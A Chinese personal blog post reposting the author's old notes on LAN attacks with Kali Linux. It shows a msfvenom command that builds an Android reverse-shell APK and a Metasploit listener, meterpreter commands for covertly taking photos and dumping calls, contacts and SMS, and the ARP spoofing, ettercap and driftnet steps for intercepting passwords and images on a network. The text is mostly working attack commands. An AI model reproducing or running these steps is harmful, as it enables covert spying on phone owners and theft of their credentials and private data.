那些年-Kali局域网msfvenom木马侵入和ARP欺骗与监听

那些年-Kali局域网msfvenom木马侵入和ARP欺骗与监听

四月 28, 2025 阅读量

kali学得好,牢饭吃到饱。
因为硬盘空间不多了,就想着把些没用的文件清理掉,就看到了KaliLinux的虚拟机有11G。几年前(20200629)学习过一点点,还能找到当时的记录,只能算自娱自乐,实施是不可能实施的。简单整理下当时的记录,也有些懵懂了,看情况把KaliLinux虚拟机干掉,毕竟很老了

必须开启root和密码 大概

msfvenom木马侵入

fping探查局域网接入设备IP

nmap扫描⽬标主机系统

生成木马 手机用 (-p载荷,LHOST本机IP,LPORT反向连接到主机的端口,R >保存路径名字)
也能生成电脑用的exe文件
sfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.88.233 LPORT=5555 R > /root/shell.apk

植入基本没戏,也就在自己手机上弄弄。安装会报毒,权限没给的话好多又用不了。

植入成功的话,启动metasploit开始监听

1
2
3
4
5
6
fmsfconsole
use exploit/multi/handler #设置模块
set payload android/meterpreter/reverse_tcp #设置载荷
set lhost 192.168.88.233 #设置本机IP
set lport 5555 #设置端口
exploit #执行攻击

获取系统信息,摄像头拍照,通讯记录

一些命令

1
2
3
4
5
6
7
8
9
10
11
12
13
? 查看更多命令
cd -->目录切换,命令:cd / 切换到根目录
search -->搜索文件,命令:search text.jpg
download -->下载文件,命令:download test.jpg
webcam_list -->查看摄像头列表,因为手机都是前置和后置摄像头了
webcam_snap -->拍照一张,需要选用前置或者后置摄像头,命令:webcam_snap -i 1
webcam_stream -->开启摄像头视频监控,同上,命令:webcam_stream -i 1
安卓系统相关命令:
check_root -->查看当前安卓是否已经root
dump_calllog -->下载通话记录
dump_contacts -->下载通讯录
dump_sms -->下载短信记录
geolocate -->利用谷歌地图定位(需要安装谷歌地图)

ARP欺骗与监听

#检查自己的网卡信息和网关

ARP欺骗 (-i 网卡名 -t 目标主机 网关(主机和网关可交换或者-r双向攻击))
arpspoof -i eth0 -t 192.168.88.77 192.168.88.1
arpspoof 是 dsniff 的一个附属工具,安装dsniff即可
apt-get install dsniff

之前阿里企业邮箱网址http还是不带s的

开启端口转发(0流量截断,断网 1流量转发)
echo 1 >> /proc/sys/net/ipv4/ip_forward(临时,每次重启终端其内容会自动变为0。永久,需要修改/etc/sysctl.conf文件,net.ipv4.ip_forward = 1)
使用ettercap抓取HTTP提交的账号密码(-T文本模式运行 -q安静模式 -i网卡)
ettercap -Tq -i eth0
可以轻松获取输入的用户名和密码信息

ARP欺骗(这里网关为目标,不然还是不能联网)
arpspoof -i eth0 -t 192.168.88.1 192.168.88.77

apt-get install driftnet
使用Driftnet从网络流量捕获图像(-i网卡 -d保存路径 -a后台运行)
driftnet -i eth0 -d /home/xuchl/arpImg -a
可以看到微信传输的一些图片,或者使用Wireshark来对其他包进行抓取

基本只是复制粘贴以前记录的文本和图片,实际参考意义不大,记录用。